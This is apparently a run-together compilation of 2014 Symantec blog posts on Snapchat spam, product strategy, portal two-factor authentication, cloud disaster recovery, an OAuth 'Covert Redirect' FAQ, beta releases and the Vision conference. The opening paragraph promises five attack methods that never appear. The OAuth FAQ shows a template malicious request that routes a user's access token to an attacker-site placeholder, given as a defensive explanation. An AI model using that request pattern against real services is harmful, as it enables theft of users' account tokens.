According to Symantec’s latest Internet Security Threat Report there were 6,787 vulnerabilities disclosed in 2013, compared with 5,291 in 2012. Even more troubling, one in eight sites had critical, unpatched known vulnerabilities with 67 percent of websites used to distribute malware identified as legitimate, compromised web sites. Today any website may be compromised by cybercriminals and used to attack your data. Here are five of the most common attack methods that continue to be the scourge of many websites.

Earlier today, photo-messaging application Snapchat unveiled new features that enable users to chat directly within the application, a frequently requested feature. The addition of this feature, while an improvement, provides the individuals responsible for Snapchat spam a new feature to play with in their efforts to target users of the service.

History of Snapchat Spam

Figure 1. Previous iterations of porn and dating spam on Snapchat

We have writtennumerousblogs about the rise of Snapchat spam over the last six months. The common thread in each of these spam campaigns was that they were all hindered by the lack of chat functionality. This roadblock presented a challenge to spammers, which led to a common workaround. Each of the spam “snap” messages sent to users featured a caption that asked them to manually perform one of the following actions:

• Add an attractive girl on Kik messenger
• Visit a website intended to push diet spam
• Inform them that they won a gift card or prize that could only be redeemed at an external website

Figure 2. Previous iterations of diet spam on Snapchat

The Future of Snapchat Spam

Now that the chat functionality is native to Snapchat, spammers can remain within the application itself and tailor their spam to work with this new functionality in mind. They can start building chat bots that communicate directly with Snapchat users or find new ways to trick users into clicking on links.

Restrictions on Sharing Links

Figure 3. Comparison of sharing links through Snapchat’s “Chat” feature

While spammers can send links within chat messages, the way they appear to the recipient can vary. For messages from non-friends, the links cannot be clicked on. For messages from friends, the links are active and clickable.

Understand that spammers are determined and will find ways to adapt. For instance, a spam campaign could begin with an initial photo message of a scantily clad woman that offers “sexier pictures” if a user adds them as friends to ensure that their links would be clickable as the campaign continues.

Review your privacy settings

Now would be a good time to review your Snapchat privacy settings and make sure that only your friends can send you snaps. Please note that even if you restrict who is allowed to send you snaps, you can still receive friend requests from spammers.

We’re keeping an eye out for new spam campaigns using this new feature and we think you should too. Tweet us @threatintel if you come across new Snapchat spam.

We live in an emerging digital industrial economy… where cloud and mobility are driving demand to secure and manage a new flood of data…. where voice, video and the Internet of Things are transforming how we function… and where businesses are challenged to protect both their intellectual property and their customers’ information.

Information is the lifeblood of this economy and it is becoming ever more mobile. Information now flows from cloud platforms to mobile apps, and from enterprises’ data centers to their business partners in ever changing ecosystems.

And the information landscape just gets more complex, from both a compliance and security perspective, as companies go global and continue to move from ‘Information Here’ in glasshouse data centers to hyper-distributed ‘Information Everywhere’. The opportunity to leverage and analyze information is increasing quickly. But the challenge to protect that information is growing as well.

Information needs to be both secure and private – but it starts with security. Information must be communicated securely; it must be stored on secure platforms and have the appropriate access control. Privacy then becomes the policy of who gets access to what information – whether individuals, business or governments.

No matter how much that information may increase, where it resides or how it is used, Symantec’s job is to be there to protect it. And we’ve got a lot of experience in the areas that matter:

• 120 petabytes of data stored in the Norton Cloud
• We analyze over 8.4 billion email messages and 1.7 billion web requests a day
• We blocked an average of 568,700 malicious website per day in 2013
• We protect 1 billion systems around the world.

We have a responsibility to those who entrust us with their safety and security, every moment of every day. Our goal is to be the ‘Information Protection Authority’, enabling our IT customers to be the stewards of information within their organizations. That is the focal point of Symantec’s strategy and Vision of the Future built on the following areas:

Unified Information Management and Information Fabric create actionable intelligence across the enterprise – integrating rich metadata, creating a consistent global view of information and helping to deliver analytics-driven information governance. The Fabric is about connecting isolated repositories of information – enabling us to rethink information management and protection.

Unified Security integrates a variety of security technologies within an overall security process that delivers not just protection but detection and response.

• Integrated Security on-premises or as a service
• Protection from the most advanced threats by delivering cloud based security intelligence
• Making security visible, but not intrusive
• Using analytics to drive predictive security

Universal Identity. A trust model where there is authentication of both users and devices, leveraging biometrics, location, context and behavior. We envision a future with no passwords where the risk based decision about who gets access to what enterprise resources is driven by intelligent authentication.

So, how do we manage all of this? How do we keep information safe and secure when it’s growing at a remarkable rate? World data in 2010 was estimated at 1.2 zettabytes. In 2015, that is expected to rise to 7.9ZB and, in 2020, to 40ZB. Meanwhile the Internet of Things will grow to something like 30 billion connected devices in the next few years.

These are staggering leaps, taking place against a background of increasing technological complexity. Businesses have to deal with a vast array of heterogeneous platforms – OS, Legacy, Physical, Virtual, Private Cloud, Public Cloud, Hybrid Cloud – as well as a wide range of business needs, such as Classification, Archive, Discovery, Data Protection, Disaster Recovery, Availability and Performance.

And the threat landscape is becoming ever more challenging with new threats targeting an increasing attack surface – across the Cloud, mobile devices, social media, remote offices/workers, and malicious employees – using sophisticated technology and advanced persistent threats (APTs). In hard statistics (source: Symantec Internet Security Threat Report Vol.19), there’s been a:

• 91% increase in targeted attacks campaigns in 2013
• 62% increase in the number of breaches in 2013
• Over 552M identities were exposed via breaches in 2013
• 23 zero-day vulnerabilities discovered
• 38% of mobile users have experienced mobile cybercrime in past 12 months

To address these challenges, enterprises traditionally rely on vertical integration and point complexity. Our focus at Symantec is to bring order to the chaos. In this new world of ever expanding data and growing threats, the enterprise is challenged to keep systems up and running; control its platform destiny; reduce the cost of storing, managing and retrieving records; and protect everything, everywhere.

Our solutions today have been designed to deliver against these challenges: NetBackup; Enterprise Vault; Storage Foundation; Cluster Server; Data Insight. Ultimately, it’s about transitioning from today’s point solutions to tomorrow’s world of integrated and intelligent orchestration, with Cloud & ecosystem support. Our job at Symantec, therefore, is to give organizations the solutions they need, in order to:

• Detect and respond to advanced threats faster
• Secure access to information without loss
• Reduce the ‘security tax’, while strengthening our customers’ risk posture
• Enable a productive workforce and embrace BYOD

And the solutions we provide to make this happen?

• Data Loss Prevention
• Encryption
• Email Gateway
• Web Gateway
• VIP/MPKI
• Endpoint Protection
• Mobile Management
• Endpoint Management
• SSL and Trust Services
• Single Sign On

No matter how complex the threats, whether internal or external, these solutions are tailored to deliver the levels of integrated security now necessary to protect businesses in a world where data dissemination, access and retrieval on a massive and global scale are becoming the norm. To that end, our strategic on-going investment is aimed at ensuring Symantec remains at the front edge of threat detection keeping our customers constantly safe and secure.

Want to know more about Symantec's Vision of the Future? Check out this video:  Innovation and Acceleration

Keeping email and web security services up and running is vital to businesses, and protecting the management of these services via a simple username and password is not enough for some organizations.

For those who desire additional security to further control access to the management portal of Symantec Email Security.cloud and Symantec Web Security.cloud, Symantec introduces new access control features:

• Two-factor authentication
• IP address restriction

Both two-factor authentication and IP address restriction options are being added to prevent unauthorized access to the management portal (also known as ClientNet). Administrators will have the option to enable one or both of these features for all administrative users within their organization.

Two-factor authentication requires something you know (like a user name and password) plus something you have (such as a one-time password from an app or token) to allow access. We are leveraging Symantec Validation and ID Protection Service (VIP) to secure access to the management portal using a one-time password credential, available in a variety of hardware, software, or mobile form factors, to augment a traditional password. By enabling two-factor authentication, administrators can protect against hacking attempts and server-side vulnerabilities that put passwords at risk.

IP address restrictions allow administrators to specify IP addresses or ranges from which access to the management portal is allowed. If someone attempts to access the management portal from an unauthorized IP address, access will be denied.

These new options are available in the management portal starting May 3rd, 2014.  The easily-enabled access control features are available for no additional cost.

Learn more about Symantec cloud products: http://www.symantec.com/cloud

Learn more about Symantec VIP: http://www.symantec.com/vip

Symantec has had years of silence. We have 2 distinct brands at different stages of awareness. With our new Brand, Digital, and Advertising strategy, our silence is over. We know who we are and that what we do adds value to people and businesses – empowering them to do what they do safely.

At Symantec, we continue to develop solutions to help you secure your agile data center and proactively engage cyber security threats. Vision 2014, which is coming up in less than three days, offers up focused, relevant content and activities so that you are more confident about your organizations capabilities to navigate the security landscape and facilitate operational alignment across security, IT operations, compliance, and business leaders.

Symantec User Authentication has some innovative new solutions to show you at Vision and forward looking information to share.

The cloud appeals to businesses for multiple reasons as it addresses many of their long standing IT issues. Whether it is lowered costs, faster deployments or just less internal red tape to deal with, businesses are finding the ease and ubiquity of the cloud tempting. One of the newer use cases topping many priority lists is leveraging the cloud for disaster recovery. Have you considered using the Cloud for Disaster Recovery?

The biggest benefit of DR to the cloud is the cost savings gained because there is no longer a need to build or rent a secondary data center. Symantec Disaster Recovery Orchestrator gives businesses the flexibility to affordably and easily initiate disaster recoveries of their Microsoft Windows applications to and from the Microsoft Azure cloud.

Symantec Disaster Recovery Orchestrator delivers the following benefits:

• Application-based replication and automated, orchestrated recovery between on-premise and Microsoft Windows Azure, including takeover and failback.
• On-premise compute independence: protect applications running in physical or in virtual environments.
• Fire Drill to provide non-disruptive recoverability confidence DR testing.
• In-Azure management portal providing simplified deployment and DR management experience as well as basic DR reporting.

If you are at Vision this week, do check out the following sessions! Microsoft will be on stage as well.

Coming off the heels of the Heartbleed bug, a new report on a security flaw called “Covert Redirect” is garnering a lot of media attention—so much that some outlets are referring to it as the next Heartbleed. But is Covert Redirect as bad as Heartbleed? Definitely not.
 

Is this the next Heartbleed?

No, it is not. This is a security flaw in the implementation of OAuth by service providers.
 

Why is Covert Redirect not as bad as Heartbleed?

Heartbleed is a serious vulnerability within OpenSSL, an open source implementation of the SSL and TLS cryptographic protocols used by over a half a million websites. The Heartbleed vulnerability could be exploited just by issuing requests to unpatched servers. Covert Redirect, however, requires an attacker to find a susceptible application as well as acquire interaction and permissions from users.
 

What is Covert Redirect?

Covert Redirect is a security flaw, not a vulnerability. It takes advantage of third-party clients susceptible to an open redirect.

For example, an attacker could covertly issue a request to a service provider's API using a susceptible site's app and modify the redirect_uri parameter. The new modified redirect_uri parameter maliciously redirects users after they have successfully authenticated.

Standard Request: [PROVIDER]/dialog/oauth?redirect_uri=[SUSCEPTIBLE SITE]&scope=email&client_id=123&response_type=token

Malicious Request: [PROVIDER]/dialog/oauth?redirect_uri=[SUSCEPTIBLE SITE]/redirectKeepParams?w=1dpoa&url=[ATTACKER SITE]&scope=email&client_id=123&response_type=token

In a malicious request, the attacker receives the user's access token, the approved application does not.
 

What is OAuth?

OAuth is an open protocol to allow secure authorization from web, mobile and desktop applications. When using OAuth—like a “Login with Facebook” button—OAuth is the authorizing mechanism and enables third-party applications to obtain access to user accounts.
 

What is the risk to users?

For this flaw to be exploited, it requires interaction from users. A user would have to grant permissions to a susceptible application in order for the access token to be compromised. An attacker may then obtain user account data which could be used for further malicious purposes.
 

What is the impact to application developers?

If there is an open redirect on your website, an attacker could target your application for Covert Redirect. It is important to lock down open redirects on your website. Service providers also recommend application developers create a whitelist of OAuth redirect URLs.
 

What is the next step?

While Covert Redirect is a notable security flaw, it is not on the same level as Heartbleed. Covert Redirect serves as a reminder to be careful about what applications you grant access to.

Do not expect a patch—it is up to the service providers to secure their own implementations to effectively address the Covert Redirect flaw.

This article contains a set of videos that discuss the installation and upgrade procedures for Storage Foundation HA for UNIX & Linux.

Come join us on May 14th for Cons, Frauds and FilmFlam - An Examination of Social Media and Mobile Application Scams. You can register at: https://symantecevents.verite.com/31068/238107

This week at Symantec Vision 2014 in Las Vegas you will see the Project-X partnership kick-off between the Norton product line and X-MEN Days of Future Past.  Not to be out-done by X-Men, the eDiscovery team at Symantec is coding its own blockbuster storylines for this summer.  We’re working on the direction for the trailer. How do these sound?

“Now able to reach into the corners of the cloud universe, IT data archeologists extract the smoking gun email, barely meeting DOJ deadlines.”  Definitely an action and adventure flick. Maybe Harrison is willing to redeem that crystal skull disaster.

Or how about, “eDiscovery administrators are finally free from case management captivity, return to the dating scene…” It has rom-com written all over it.

Or maybe, “Virtualization...”

That’s all I’ve got on that one. Sounds sci-fi enough on its own.

The true story is the upcoming release of the Symantec™ eDiscovery Platform powered by Clearwell plans to deliver elements of all three.

Collection from cloud data sources

The range of target sources for eDiscovery collections continues to widen as employees utilize a diverse set of applications to store and manage business information. To support users under constrained resources, IT departments are increasingly deploying these applications in cloud environments. Two critical applications that are moving to the cloud as well as becoming important sources for eDiscovery are email archives and SharePoint.

The upcoming release of the eDiscovery Platform plans to enable the search, filter, collection and preservation of information stored in Enterprise Vault.cloud directly from the eDiscovery Platform interface and in tandem with other collection and legal hold tasks.

Additionally the summer release plans collection of all SharePoint data whether online or on-premise to provides users the ability to collect all content types from their SharePoint environments along with revision history –helping to prevent spoliation and improve the defensibility of the collection process.

eDiscovery review automation

Every eDiscovery effort eventually includes an element of linear review, where teams of attorneys determine characteristics like relevancy, privilege, trade secrets, etc. of each document in a data set and tag it appropriately. One time consuming challenge of this process is the need to manually folder, batch and move groups of 'tagged' documents to the appropriate next stage of review. The Symantec eDiscovery Platform plans to leapfrog this manual step with rules based automation.
 

Workflow automation rules free eDiscovery administrators from the fits and stops of a tiered review process. Leveraging an easy to use template to custom build rules that automatically move certain groups of tagged documents from one stage of the review to the next stage, customers improve the speed at which linear review can be conducted.

Virtualization

As case data sets continue to grow and IT departments look to modernize their environments our customers demand consumer grade performance and deployment flexibility. Virtualization enables Symantec eDiscovery Platform customers to deploy their solution in any configuration, appliance based or virtual. In a virtualized deployment, customers can rapidly provision large scale deployments, easily expand existing deployments and (if relevant) comply with virtualization/cloud mandates.

Be sure to tune in to the Vision keynote announcement and if you’re in Vegas stop by the Information Governance Experience to see the Symantec eDiscovery Platform in action.  For more information on the eDiscovery Platform visit http://www.symantec.com/ediscovery-platform

PLEASE READ: Any forward-looking indication of plans for products is preliminary and all future release dates are tentative and are subject to change. Any future release of the product or planned modifications to product capability, functionality, or feature are subject to ongoing evaluation by Symantec, and may or may not be implemented and should not be considered firm commitments by Symantec and should not be relied upon in making purchasing decisions.

We're pleased to update you that Symantec DLO 7.6 Beta (Windows + Mac) has moved to the next stage, with a full feature build now available for download.

Please login to SymBeta (https://symbeta.symantec.com/login.html) to access access the build.

If you haven’t already registered for the Beta program, you’ll need to register here https://symbeta.symantec.com/callout/?callid=86FFCE8379A949318C954A79957EF283.

Top features available in this build include

•          Backup Interruption Tolerance
•          Support for Open file Backup
•          Enhanced De-Duplication – Improved Reliability, Scalability and Performance
•          Lotus Notes 9.x Support
•          Support for Lotus Notes NSF files Deduplication.
•          Support for MAC Clients.
•          Alerts/Notifications Usability Improvements
•          Automatic Integrity Checker
•          CPU Process Priority Throttling
•          Backup Completion & Last Successful Backup Report
•          VIP Users File Restrictions
•          Restricted Admin privileges (  Multi Level DLO Admins )
•          Windows Server 2012 R2 Support
•          Backup MAC agents
•          Field defects, bug-fixes and stabilization

Points to note:

This build has all DLO 7.6 features, Support for Mac and Upgrade support from released versions of Symantec DLO 7.0, 7.5, 7.5 SP1, BE DLO 2010 R3 and NBU DLO 6.1 MP7.

Note: This build ( Both Server and Client ) should not be upgraded from the previous Mac BETA build.

Queries:

If you have any trouble with downloading the build or  have any queries, please post in the Forum. You may also contact us at Ramadas_Menon@symantec.com OR SymantecDLO_Beta@mindtree.com

Look forward to your active participation and feedback!

Regards,

DLO Program Management Team

At Symantec, we walked the walk when it came to making our own IT agile. We also learned a lot by boldly embracing some of the cutting edge technologies and developing solutions to fill the gaps. Drew Meyer walks through some of the company's journeys in developing an agile data center.

Here is May 2014's Most Popular Content in the Storage and Clustering community:

1. http://www.symantec.com/connect/videos/datacane-be...
2. http://www.symantec.com/connect/forums/how-find-lu...
3. http://www.symantec.com/connect/forums/how-check-v...
4. http://www.symantec.com/connect/forums/veritas-dis...
5. http://www.symantec.com/connect/sfha61
6. http://www.symantec.com/connect/forums/remove-lun-...
7. http://www.symantec.com/connect/forums/vcs-cluster...
8. http://www.symantec.com/connect/forums/veritas-clu...
9. http://www.symantec.com/connect/forums/sfha-soluti...
10. http://www.symantec.com/connect/videos/flexible-st...
11. http://www.symantec.com/connect/videos/application...
12. http://www.symantec.com/connect/forums/how-check-v...
13. http://www.symantec.com/connect/forums/how-delete-...
14. http://www.symantec.com/connect/sfhaw61
15. http://www.symantec.com/connect/forums/new-disk-er...

Summarizes the various breakout sessions and hands-on-labs that will focus on NetBackup at Symantec Vision this year.

Symantec Control Compliance Suite Standards Manager started shipping on April 15, 2014. Learn more about CCS Standards Manager by attending a hands-on lab session on May 7, Wednesday @ 2:00 PM - 3:00 PM – MILANO 1. Lab 1381- Enhance Asset Discovery and SCAP 1.2 Compliance for Continuous Monitoring with CCS Standards Manager, will demonstrate how CCS Standards Manager's new network and asset discovery capabilities and SCAP 1.2 support enhances your continuous monitoring objectives.

Greetings NetBackup professionals! The NetBackup product team is actively planning for our biggest Vision conference ever. In addition to participating in over 100 training sessions and hand-on labs, conference attendees will be able to hear the latest on the future direction of NetBackup, connect with the thought leaders and subject matter experts who drive our data protection technologies, and network with their peers to learn how they are using NetBackup to protect their information.

We’d like your help to make sure the educational experience is exactly what you’re looking for. We’ve put together a quick survey of possible NetBackup topics we may cover at the conference. Please share your opinions with us and let us know which of these topics interests you:

Click here to fill out our Vision NetBackup topic survey

Symantec Vision 2014 Conference Details:

Where: Caesars Palace, Las Vegas
When: Monday, May 5 through Thursday, May 8
Register: http://www.symantec.com/vision/

Symantec Vision 2014 has finally arrived—with four days of face-to-face insights, information and experiences you can use to secure and manage your information-driven organization.So settle in and get ready for a great week at the biggest and most productive Vision conference yet.

Don’t Miss Tomorrow’s Opening Keynote

Join us bright and early Tuesday morning to hear Symantec interim President and CEO Mike Brown, Symantec COO Stephen Gillett, and other leading experts provide an exclusive insider’s look into how Symantec can help you enable your agile data center, support evolving endpoints and embrace proactive cyber security. The keynote begins at 9:00 am, but make sure you’re seated by 8:45 am to win some amazing prizes at our Early Bird drawing.

Hit the Ground Running

To get the most from your week at Vision, make sure you:

Get Checked-in early: If you haven’t picked up your badge and conference materials, take the time to check in at the Registration and Conference Services Desk located on the Promenade Level of the Caesars Palace Conference Center any time from 8:00 am to 7:00 pm today.

Getting the Most out of Vision—There’s an App For That: The Vision 2014 Mobile App is the best way to stay in the loop while you’re on the go at Vision. Use this handy tool to review the conference schedule, access your personal agenda, register for breakouts and hands-on labs, take session surveys, learn more about our sponsors, and track your New Horizons game points. This free App is available for your Blackberry, Android, or iPhone/iPad through BlackBerry World, Google Play or the iTunes Store.

Start your conference experience TODAY by attending breakout sessions, hands-on labs, and training and certification courses. Check your Vision Pocket Guide for details.

Kick off Your Week by Celebrating Cinco de Mayo Vision Style! Join us in the Partner Expo Hall this evening from 4:30-7:30 pm to celebrate the official launch of Vision 2014 along with Cinco de Mayo. It’s your perfect opportunity to find out more about various promotions, chat with Vision sponsors, industry experts, and your fellow attendees; and learn more about all of the other events and activities taking place throughout the week. Plus, it’s a great opportunity to fill up on some festive food and beverages.

Stop by the Partner Expo Hall

DON’T MISS YOUR THIS OPPORTUNITY TO NETWORK WITH INDUSTRY LEADERS.

Check out the Social Media Center

AND TWEET OFTEN USING #SYMVISIONLV OR #SYMVISIONPROMO.

At Vision, Symantec’s annual user and technical conference, I had the opportunity to speak with many of our channel partners and share more details regarding our redesigned Partner Program. As Symantec continues to grow as a company, we’re planning some exciting changes.

Today, we’re unveiling 12 new Symantec Solution Competencies. These new Competencies give partners the choice to deepen their expertise in a particular solution area, or to extend their capabilities across multiple solutions for broader market traction. By achieving a Symantec Competency, partners demonstrate their insight, experience and solutions-expertise – crucial when solving their customers’ unique business challenges.

We’re also investing more in our partners than ever before. In the October timeframe, partners will have access to richer rewards, based on capability, performance and commitment to delivering value to customers. Through the redesigned Partner Program, eligible partners may receive new and enhanced financial and business benefits:

• Partners can increase their earning potential by as much as 20% through Symantec’s Opportunity Registration Program, a benefit available to partners who achieve Principal or Expert level Competency and who first identify, develop and close incremental sales opportunities on qualifying products and services.
• The new Growth Accelerator Rebate, available to partners who invest in achieving Expert Competencies, offers partners the potential to earn up to an 8% rebate by reaching and exceeding new business revenue targets.
• A new Renewals Performance Incentive, which offers partners who have earned one or more Expert Competencies and who meet or exceed defined renewal opportunity targets, up to a 2% rebate on applicable total renewal business.
• Partners who possess one or more Expert Competencies will be eligible to apply to receive Development Funds, as much as 5% for qualified Platinum tier program members.

In addition to financial benefits, all partners will now have access to a more comprehensive enablement portfolio and a host of valuable sales, marketing and technical benefits designed to help them increase customer demand and adoption, speed the sales cycle and accelerate their success. Partners who invest in achieving at least one Expert Competency can also benefit from deeper insight into customers’ buying behaviors through new Market Intelligence Reports.

We are now entering a transition period within which partners can assess the requirements and benefits associated with the redesigned Partner Program structure. We are committed to supporting our partners through this transition period, with the objective of helping to ensure that they’re well-positioned to take full advantage of a more rewarding partnership with Symantec. This is an opportune time for our partners to identify areas they wish to develop, pursue new Competencies and to develop plans for growth. I also encourage our partners to visit PartnerNet to stay up-to-date on the latest program information, and check out our upcoming webcasts and events.